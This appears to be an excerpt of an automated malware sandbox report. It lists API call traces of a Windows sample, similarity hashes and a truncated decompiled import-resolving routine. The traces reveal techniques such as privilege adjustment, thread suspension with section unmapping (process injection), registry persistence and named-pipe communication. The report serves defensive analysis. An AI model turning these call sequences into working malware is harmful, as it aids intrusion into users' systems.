    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
